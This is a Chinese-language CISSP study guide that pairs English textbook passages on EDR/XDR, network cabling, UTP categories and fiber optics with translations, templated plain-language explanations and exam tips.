EDR的目标是检测比传统防病毒程序或HIDS更 可能先进的滥用行为,同时优化事件响应的响应时间,排除误报,实施对高级 威胁的阻断,并抵御同时发生且通过多种攻击向量的多重威胁。 与EDR相关的几个概念包括托管检测与响应(MDR)、端点保护平台(EPP) 和扩展检测与响应(XDR)。 MDR侧重于威胁检测和应对,但不仅限于端点范 围。 MDR是一种服务,旨在实时监控IT环境,以快速检测和解决威胁。 通常, MDR解决方案是多种技术的组合与集成,包括SIEM、网络流量分析(NTA)、 EDR和IDS。 EPP 是 EDR 的一种变体,就像 IPS 是 IDS 的一种变体一样。 EPP 的重点在于四 大安全功能:预测、预防、检测和响应。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 92 / PDF P810

第 810 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Thus, EPP is the more active prevent and predict variation of the more passive EDR concept. XDR is not so much another tool as the collection and integration of several concepts into a single solution. XDR components can vary between vendors, but they often include EDR, MDR, and EPP elements. Also, XDR is not solely focused on endpoints, but often includes NTA, NIDS, and NIPS functions as well. From there, we might as well mention that a managed security service provider (MSSP) can provide XDR solutions that are centrally controlled and managed. MSSP solutions can be deployed fully on-premises, fully in the cloud, or as a hybrid structure.

MSSP solutions can be overseen through an SOC, which is itself local or remote. Typically, working with an MSSP to provide EDR, MDR, EPP, or XDR services can allow an organization to gain the benefits of these advanced security products and leverage the experience and expertise of the MSSP's staff of security management and response professionals. Cabling, Topology, and Transmission Media Technology Establishing security on a network involves more than just managing the operating system and software. You must also address physical issues, including cabling, topology, and transmission media technology. LANs vs. WANs There are two basic types of networks: LANs and WANs.

A local area network (LAN) is a network in a limited geographical area, typically spanning a single floor or building. Wide area network (WAN) is the term usually assigned to the long-distance connections between geographically remote networks. Transmission Media Transmission media refers to the physical pathways or channels through which data is transmitted from one location to another. The characteristics of transmission media impact the quality and reliability of signal propagation. The type of connectivity media employed in a network is important to the network's design, layout, and capabilities. Without the right transmission

中文直译 / 整理

因此,EPP 是比更为被动的 EDR 概念更为主动的预防和预测变体。 XDR 并不仅仅是一个额外的工具,而是将多个概念集合并整合为一个统一的解 决方案。 XDR 组件因供应商而异,但通常包括 EDR、MDR 和 EPP 元素。 此 外,XDR 不仅关注终端,还通常包含 NTA、NIDS 和 NIPS 功能。 从这里,我们不妨提及,托管安全服务提供商(MSSP)可以提供集中控制和 管理的 XDR 解决方案。 MSSP 解决方案可以完全部署在本地、完全在云端, 或采用混合架构。 MSSP 解决方案可通过 SOC 进行监管,而 SOC 本身可以是 本地或远程的。 通常,与 MSSP 合作提供 EDR、MDR、EPP 或 XDR 服务, 可以使组织获得这些先进安全产品的优势,并利用 MSSP 安全管理与响应专业 人员的经验和专长。 布线、拓扑与传输介质技术 建立网络安全性不仅仅涉及管理操作系统和软件。 您还必须解决物理问题, 包括布线、拓扑结构和传输介质技术。 局域网与广域网 网络有两种基本类型:局域网和广域网。 局域网(LAN) 是指在有限地理 区域内运行的网络,通常覆盖单层楼或单栋建筑。

广域网(WAN) 是用于 连接地理上远程网络的长距离连接的通用术语。 传输介质 传输介质是指数据从一个位置传输到另一个位置的物理路径或信道。 传输介质 的特性会影响信号传播的质量和可靠性。 网络中所采用的连接介质类型对网络 的设计、布局和功能至关重要。 如果没有合适的传输

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 810 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 93 / PDF P811

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

media, a network may not be able to span your entire enterprise, or it may not support the necessary traffic volume. In fact, the most common causes of network failure (in other words, violations of availability) are cable failures or misconfigurations. It is important for you to understand that different types of network devices and technologies are used with different types of cabling. Each cable type has unique useful lengths, throughput rates, and connectivity requirements. Physical protection measures, such as using secure conduits, enclosures, and access controls, help prevent unauthorized tampering with transmission media.

Implementing encryption technologies ensures that even if the transmission medium is physically accessed, the data remains secure and unreadable without the proper decryption keys. In the realm of transmission media signal propagation quality, several factors come into play: Attenuation: This refers to the loss of signal strength as it travels through the medium. Over longer distances, attenuation can significantly reduce the signal's strength, potentially leading to degradation. Interference: Unwanted signals that disrupt the transmission fall under interference.

Sources such as electromagnetic interference (EMI) and radio-frequency interference (RFI) can disturb the signal and impact the overall quality of communication. Noise: Unwanted random variations in the signal constitute noise. Noise can distort the original signal, complicating the accurate interpretation of transmitted data. Jitter: The variation in latency between different packets. Bandwidth: The range of frequencies that a medium can support is defined as bandwidth. A higher bandwidth allows for the transmission of more data, contributing to improved signal quality and faster communication.

Propagation delay or latency: The time taken for a signal to travel from the sender to the receiver is known as propagation delay. Propagation delay directly influences the speed of communication, and in certain applications, minimizing this delay is crucial.

中文直译 / 整理

介质,网络可能无法覆盖整个企业,或者可能无法支持必要的流量。 事实上, 网络故障(即可用性违规)最常见的原因是电缆故障或配置错误。 您需要理解, 不同类型的网络设备和技术与不同类型的电缆配合使用。 每种电缆类型都有其 独特的有效长度、吞吐率和连接要求。 物理保护措施,例如使用安全线缆、封闭装置和访问控制,有助于防止对传输 介质的未授权篡改。 实施加密技术可确保即使传输介质被物理访问,数据仍保 持安全且在没有正确解密密钥的情况下无法读取。 在传输介质信号传播质量方面,涉及多个因素: 衰减:这指的是信号在通过介质传输时的强度损失。 在较长距离下,衰减 会显著降低信号强度,可能导致信号劣化。 干扰:干扰是指干扰传输的非期望信号。 电磁干扰(EMI)和射频干扰 (RFI)等来源可能干扰信号,影响通信的整体质量。 噪声:信号中非期望的随机变化构成噪声。 噪声会扭曲原始信号,使传输 数据的准确解释变得复杂。 抖动:不同数据包之间延迟的变化。 带宽:介质所能支持的频率范围被定义为带宽。 更高的带宽允许传输更多 数据,从而提升信号质量并加快通信速度。 传播延迟或延迟:信号从发送方传输到接收方所需的时间称为传播延迟。

传播延迟直接影响通信速度,在某些应用中,最小化此延迟至关重要。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 94 / PDF P812

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Understanding and addressing these factors are essential components of designing reliable and efficient transmission systems, ensuring optimal performance and data integrity in communication networks. Remember that many forms of transmission media are not cables. This includes wireless, Bluetooth, Zigbee, and satellites, which were all discussed earlier in this chapter. Coaxial Cable Coaxial cable, also called coax, was a popular networking cable type used throughout the 1970s and 1980s. In the early 1990s, its use quickly declined because of the popularity and capabilities of twisted-pair wiring (explained in more detail later).

In the 2020s, you are unlikely to encounter coax being used as a LAN network cable but may still see some use of it as an audio/visual connection cable (such as between an over-the-air antenna and your television) or as an internet access media (such as from the wall to your cable modem). Coaxial cable has a center core of copper wire surrounded by a layer of insulation, which is in turn surrounded by a conductive braided shielding and encased in a final insulation sheath. There are two legacy types of coaxial cable: thinnet and thicknet. Thinnet (10Base2) was commonly used to connect systems to backbone trunks of thicknet cabling.

Thinnet can span distances of 185 meters and provide throughput up to 10 Mbps. Thicknet (10Base5) can span 500 meters and provide throughput up to 10 Mbps. A more modern coax format is RG6, which is commonly used for various applications in telecommunications, audio/video, and broadband communication systems.

The most common problems with coax cable are as follows: Bending the coax cable past its maximum arc radius and thus breaking the center conductor Deploying the coax cable in length greater than its maximum recommended length (which is 185 meters for 10Base2 or 500 meters for 10Base5) Not properly terminating the ends of the coax cable with a 50-ohm BNC resistor Not grounding at least one end of a terminated coax cable

中文直译 / 整理

理解和解决这些因素是设计可靠且高效传输系统的关键组成部分,可确保 通信网络中的最优性能和数据完整性。 请记住,许多传输介质并不是电缆。 这包括无线、蓝牙、Zigbee 和卫星,这 些在本章前面都已讨论过。 同轴电缆 同轴电缆,也称为coax,是 1970 年代和 1980 年代广泛使用的网络电缆类型。 在 1990 年代初,由于双绞线(后文将详细解释)的普及和性能,其使用迅速 减少。 在 2020 年代,您不太可能遇到同轴电缆被用作局域网电缆,但您仍可 能看到它被用作音频/视频连接电缆(例如在空中天线与电视之间)或互联网接 入介质(例如从墙壁到您的电缆调制解调器)。 同轴电缆由中心铜线芯组成,外层包裹绝缘层,再外层为导电编织屏蔽层,最 外层为最终绝缘护套。 有两种传统的同轴电缆类型:细缆和粗缆。 细缆( 10Base2)常用于将系统连接到粗缆主干。 细缆可支持 185 米的距离,并提供 最高 10 Mbps 的吞吐量。 粗缆(10Base5)可支持 500 米的距离,并提供最高 10 Mbps 的吞吐量。 一种更现代的同轴电缆格式是 RG6,常用于电信、音视频 和宽带通信系统的各种应用。

同轴电缆最常见的问题如下: 将同轴电缆弯曲超过其最大弧半径,从而导致中心导体断裂 将同轴电缆部署的长度超过其推荐的最大长度(10Base2 为 185 米, 10Base5 为 500 米) 未使用 50 欧姆 BNC 电阻器正确终止同轴电缆的两端 未对已终止的同轴电缆至少一端进行接地

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
学习单元 95 / PDF P813

第 813 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Baseband and Broadband Cables The naming convention used to label most network cable technologies follows the syntax XXyyyyZZ. XX represents the maximum speed the cable type offers, such as 10 Mbps for a 10Base2 cable. The next series of letters, yyyy, represents the baseband or broadband aspect of the cable, such as baseband for a 10Base2 cable. Baseband cables can transmit only a single signal at a time, and broadband cables can transmit multiple signals simultaneously. Most networking cables are baseband cables. However, when used in specific configurations, coaxial cable can be used as a broadband connection, such as RG6 coax used with cable modems.

ZZ either represents the maximum distance the cable can be used or acts as shorthand to represent the technology of the cable, such as the approximately 200 meters for 10Base2 cable (actually 185 meters, but it's rounded up to 200) or T or TX for twisted-pair in 100BaseT or 100BaseTX. Twisted-Pair Twisted-pair cabling is extremely thin and flexible compared to coaxial cable. It consists of four pairs of wires that are twisted around each other and then sheathed in a PVC insulator. If there is a metal foil wrapper around the wires underneath the external sheath, the wire is known as shielded twisted-pair (STP). The foil provides additional protection from external EMI.

Twistedpair cabling without the foil is known as unshielded twisted-pair (UTP). The wires that make up UTP and STP are small, thin copper wires that are twisted in pairs. The twisting of the wires provides protection from external radio frequencies and electric and magnetic interference and reduces crosstalk between pairs. Crosstalk occurs when data transmitted over one set of wires is picked up by another set of wires due to radiating electromagnetic fields produced by the electrical current.

Each wire pair within the cable is twisted at a different rate (in other words, twists per foot); thus, the signals traveling over one pair of wires cannot cross over onto another pair of wires (at least within the same cable). The tighter the twist (the more twists per foot), the more resistant the cable is to internal and external interference and crosstalk, and thus, the capacity for throughput (that is, higher bandwidth) is greater. There are several classes of UTP cabling. The various categories are created through the use of tighter twists of the wire pairs, variations in the quality of

中文直译 / 整理

基带和宽带电缆 用于标记大多数网络电缆技术的命名约定遵循 XXyyyyZZ 的语法。 XX 表示该 电缆类型提供的最大速度,例如 10Base2 电缆的 10 Mbps。 接下来的字母序列 yyyy 表示电缆的基带或宽带特性,例如 10Base2 电缆的基带。 基带 电缆一次 只能传输一个信号,而 宽带 电缆可以同时传输多个信号。 大多数网络电缆都是 基带电缆。 然而,在特定配置下,同轴电缆可用作宽带连接,例如与电缆调制 解调器一起使用的 RG6 同轴电缆。 ZZ 要么表示电缆可使用的最大距离,要么 作为表示电缆技术的缩写,例如 10Base2 电缆约 200 米的距离(实际为 185 米, 但向上取整为 200),或用于双绞线的 T 或 TX,如 100BaseT 或 1 00BaseTX。 双绞线 双绞线缆与同轴电缆相比极其细小且柔韧。 它由四对相互缠绕的导线组成,外 层包裹着聚氯乙烯绝缘层。 如果在外部护套下导线周围有金属箔包裹,则该线 缆称为屏蔽双绞线(STP)。 金属箔可提供额外的外部电磁干扰(EMI)防护。 没有金属箔的双绞线缆称为非屏蔽双绞线(UTP)。 构成UTP和STP的导线是细小的铜线,成对缠绕。

导线的缠绕可防止外部射频 以及电场和磁场干扰,并减少线对之间的串扰。 串扰发生在一组导线传输的数 据因电流产生的辐射电磁场而被另一组导线接收时。 电缆内的每对导线均以不 同的速率缠绕(即每英尺的缠绕次数); 因此,通过一对导线传输的信号无法 跨越到另一对导线(至少在同一电缆内)。 缠绕越紧密(每英尺缠绕次数越多), 电缆对内部和外部干扰及串扰的抵抗力就越强,从而具有更高的吞吐量(即更 高的带宽)。 UTP电缆有多个类别。 各种类别是通过使用更紧密的线对绞合、导体质量的差异 以及外部屏蔽质量的差异来实现的。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 813 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 96 / PDF P814

第 814 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

the conductor, and variations in the quality of the external shielding. Table 11.4 shows the original UTP categories. TABLE 11.4 UTP categories UTP category Throughput Notes Cat 1 1 Mbps Primarily used for voice. Not suitable for networks, but usable by modems. Cat 2 4 Mbps Original Token Ring networks and host-toterminal connections on mainframes. Cat 3 10 Mbps Primarily used in Ethernet networks (10BaseT) and as telephone cables. Cat 4 16 Mbps Primarily used in Token Ring networks. Cat 5 100 Mbps Used in 100BaseTX, FDDI, and ATM networks. Cat 5e 1 Gbps Gigabit Ethernet (1000BaseT). Cat 6 1 Gbps Gigabit Ethernet (10G Ethernet with 55-meter distance limit).

Cat 6a 10 Gbps Gigabit Ethernet, 10G Ethernet. Cat 7 10 Gbps Gigabit Ethernet, 10G Ethernet. Cat 8 40 Gbps 10G+ Ethernet. The following problems are the most common with twisted-pair cabling: Using the wrong category of twisted-pair cable for high-throughput networking Deploying a twisted-pair cable longer than its maximum recommended length (in other words, 100 meters) Using UTP in environments with significant interference Conductors The distance limitations of conductor-based network cabling stem from the resistance of the metal used as a conductor. Copper, the most popular conductor, is one of the best and least expensive room-temperature conductors available.

However, it is still resistant to the flow of electrons.

中文直译 / 整理

导体的质量差异和外部屏蔽的质量差异。 表 11.4显示了原始的UTP类别。 表 11.4 UTP 类别 UTP 类别 吞吐量备注 Cat 1 1 Mbps 主要用于语音。 不适用于网络,但可用于调 制解调器。 Cat 2 4 Mbps 原始的令牌环网络和大型机上的主机到终端连接。 Cat 3 10 Mbps 主要用于以太网网络(10BaseT)和电话电缆。 Cat 4 16 Mbps 主要用于令牌环网络。 Cat 5 100 Mbps 用于100BaseTX、FDDI和ATM网络。 Cat 5e 1 Gbps 千兆以太网(1000BaseT)。 Cat 6 1 Gbps 千兆以太网(10G 以太网,距离限制为 55 米)。 Cat 6a 10 Gbps 千兆以太网,10G以太网。 Cat 7 10 Gbps 千兆以太网,10G以太网。 Cat 8 40 Gbps 10G+ Ethernet. 以下问题是双绞线布线中最常见的: 为高吞吐量网络使用错误类别的双绞线 部署超过其最大推荐长度的双绞线(即100米) 在存在显著干扰的环境中使用UTP 导体 导线型网络布线的距离限制源于用作导体的金属的电阻。

铜是最受欢迎的导 体,是可用的最优良且最便宜的室温导体之一。 然而,它仍然对电子的流动 具有阻力。

小白解释

场景先行:你是公司的安全负责人,正在读第 814 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 814 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 97 / PDF P815

第 815 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

This resistance results in a degradation of signal strength and quality over the length of the cable. The maximum length defined for each cable type indicates the point at which the level of degradation could begin to interfere with the efficient transmission of data. This degradation of the signal is known as attenuation. It is often possible to use a cable segment that is longer than the cable is rated for, but the number of errors and retransmissions will be increased over that cable segment, ultimately resulting in poor network performance. Attenuation is more pronounced as the speed of the transmission increases.

We recommend that you use shorter cable lengths as the speed of the transmission increases. Long cable lengths can often be supplemented through the use of repeaters or concentrators. A repeater is a signal amplification device, much like the amplifier for your car or home stereo. The repeater boosts the signal strength of an incoming data stream and rebroadcasts it through its second port. A concentrator does the same thing except it has more than two ports. However, using more than four repeaters (or hubs) in a row is discouraged (see the sidebar “5-4-3 Rule”).

5-4-3 Rule The 5-4-3 rule is used whenever Ethernet or other IEEE 802.3 sharedaccess networks are deployed using hubs and repeaters as network connection devices in a tree topology (in other words, a central trunk with various splitting branches). This rule defines the number of repeaters/concentrators and segments that can be used in a network design.

The rule states that between any two nodes (a node can be any type of processing entity, such as a server, client, or router), there can be a maximum of five segments connected by four repeaters/concentrators, and it states that only three of those five segments can be populated (in other words, have additional or other host or networking device connections). The 5-4-3 rule does not apply to switched networks or the use of bridges or routers. Fiber-Optic Cables

中文直译 / 整理

这种电阻会导致电缆长度上的信号强度和质量下降。 每种电缆类型定义的最大长度表示信号劣化可能开始干扰数据高效传输的点。 这种信号劣化被称为衰减。 通常可以使用超过电缆额定长度的电缆段,但该电 缆段上的错误和重传次数会增加,最终导致网络性能下降。 随着传输速度的提 高,衰减会更加明显。 我们建议在传输速度提高时使用更短的电缆长度。 通常可以通过使用中继器或集线器来弥补较长的电缆长度。 中继器是一种信号 放大设备,类似于汽车或家庭立体声系统的放大器。 中继器增强传入数据流的 信号强度,并通过其第二个端口重新广播。 集线器的作用相同,但具有两个以 上的端口。 然而,不建议连续使用超过四个中继器(或集线器)(参见侧边栏 “5‑4‑3规则”)。 5‑4‑3规则 当使用集线器和中继器作为网络连接设备,在树形拓扑结构(即一个主干带 多个分支)中部署以太网或其他IEEE 802.3共享访问网络时,需遵循 5‑4‑3规则。 该规则定义了在网络设计中可使用的中继器/集线器和网段的数 量。

规则规定,在任意两个节点(节点可以是任何类型的处理实体,例如服 务器、客户端或路由器)之间,最多可连接五个网段,由四个中继器/集线 器连接,且这五个网段中仅有三个可以被占用(即连接有其他主机或网络设 备)。 5‑4‑3规则不适用于交换网络或使用网桥或路由器的情况。 光纤电缆

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

自主访问控制 DAC:DAC 由对象所有者决定谁能访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 815 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

文件所有者授权、ACL 常见于 DAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 98 / PDF P816

第 816 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

An alternative to conductor-based network cabling is fiber-optic cable. Fiberoptic cables transmit pulses of light rather than electricity. This gives fiberoptic cable the advantage of being extremely fast and nearly impervious to tapping and interference. Fiber will typically cost more to deploy than twisted pair, but its price premium has decreased to be more in line with other deployments and is often well worth the expense for its security, interference resilience, and performance. Fiber can be deployed as single-mode (supporting a single light signal) or multimode (supporting multiple light signals).

Single-mode fiber has a thinner optical core, lower attenuation over distance, and potentially unlimited bandwidth. It uses a 1310 nm or 1550 nm wavelength laser, can be deployed in runs up to 10 km without repeaters, and is typically sheathed in yellow. Multimode fiber has a larger optical core, higher attenuation over distance, and bandwidth limitations (inversely related to distance), and it uses 850 nm or 1300 nm wavelength LEDs or lasers, has a maximum run length of 400m, and is typically sheathed in blue, aqua, or orange.

Dense Wavelength Division Multiplexing (DWDM) is an optical communication technology used in fiber-optic communication systems to increase the capacity and efficiency of the network. DWDM enables multiple data streams or channels to be simultaneously transmitted over a single optical fiber, each using a different wavelength of light. This allows for the simultaneous transmission of a large number of independent signals, significantly increasing the overall capacity of the fiber-optic infrastructure. Transport Architecture The transport architecture in networking encompasses several key aspects.

First, network topology refers to the physical or logical layout of devices and connections, including configurations like bus, ring, star, mesh, tree, and hybrid. The chosen topology influences factors such as scalability, fault tolerance, and ease of management. Network topologies are discussed in the next section. Second, transport architecture is often focused on the concept of planes. The concept of network architecture planes refers to the division of networking functionality and responsibilities into distinct layers or planes, each serving a specific purpose. This separation helps in organizing and managing the different aspects of network operations.

The three primary planes in network architecture are the data plane, control plane, and management plane. The data plane, or forwarding plane, is responsible for the transmission of user

中文直译 / 整理

一种替代导体网络布线的方案是光纤电缆。 光纤电缆传输的是光脉冲而非电信 号。 这使得光纤电缆具有极快的速度和几乎不受窃听与干扰的优势。 与双绞线 相比,光纤的部署成本通常更高,但其价格溢价已大幅下降,现已与其他部署 方式相当,考虑到其安全性、抗干扰能力和性能,通常物有所值。 光纤可部署 为单模(支持单一光信号)或多模(支持多个光信号)。 单模光纤具有更细的 光学核心、更低的衰减和潜在的无限带宽。 它使用1310 nm或1550 nm波长的 激光器,可在无需中继器的情况下部署长达10 km,通常外护套为黄色。 多模 光纤具有更大的光学核心、更高的衰减和带宽限制(与距离成反比),使用 850 nm或1300 nm波长的LED或激光器,最大传输距离为400米,通常外护套 为蓝色、青色或橙色。 密集波分复用(DWDM)是一种用于光纤通信系统的光通信技术,用于提高 网络的容量和效率。 DWDM 能够在单根光纤上同时传输多个数据流或信道, 每个信道使用不同的光波长。 这使得大量独立信号能够同时传输,显著提高了 光纤基础设施的整体容量。 传输架构 网络中的传输架构包含多个关键方面。

